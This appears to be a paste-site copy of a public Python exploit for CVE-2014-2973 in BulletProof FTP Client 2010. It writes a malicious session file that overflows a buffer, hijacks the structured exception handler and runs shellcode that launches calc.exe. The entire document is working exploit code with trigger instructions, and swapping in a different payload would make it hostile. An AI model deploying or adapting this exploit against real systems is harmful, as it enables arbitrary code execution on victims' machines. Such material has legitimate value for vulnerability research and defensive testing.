Tr3v0r12345

BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit

Sep 7th, 2014
```python
#!/usr/bin/python
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit  #
# Date: Sep 05 2014                                                           #
# Vulnerability Discovery: Gabor Seljan                                       #
# Exploit Author: Robert Kugler                                               #
# Software Link: http://www.bpftp.com/                                        #
# Version: 2010.75.0.76                                                       #
# Tested on: Windows XP                                                       #
# CVE: CVE-2014-2973                                                          #
#                                                                             #
# Thanks to corelanc0d3r for his awesome tutorials and help! ;-)              #
# The "Enter URL" form is also vulnerable                                     #
#-----------------------------------------------------------------------------#

buffer = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n"
buffer += "\x20" + "\x90" * 89
buffer += "\xeb\x06\x90\x90"
buffer += "\xA0\xB3\x3C\x77"  # shell32.dll pop pop ret @773CB3A0
buffer += "\x90" * 119  # 160 characters space
buffer += ("\x33\xc0\x50\x68"
           "\x2E\x65\x78\x65"
           "\x68\x63\x61\x6C"
           "\x63\x8B\xC4\x6A"  # 36 bytes
           "\x01\x50\xBB\x35"  # ExitProcess is located at 0x77e598fd in kernel32.dll
           "\xfd\xe4\x77\xFF"
           "\xD3\x33\xc0\x50"
           "\xc7\xc0\x8f\x4a"
           "\xe5\x77\xff\xe0")

buffer += "\x90" * (1000 - len(buffer))

# Just load the "BP Session" and click on "Connect".

file = open("ftpsession.bps", "w")
file.write(buffer)
file.close()
```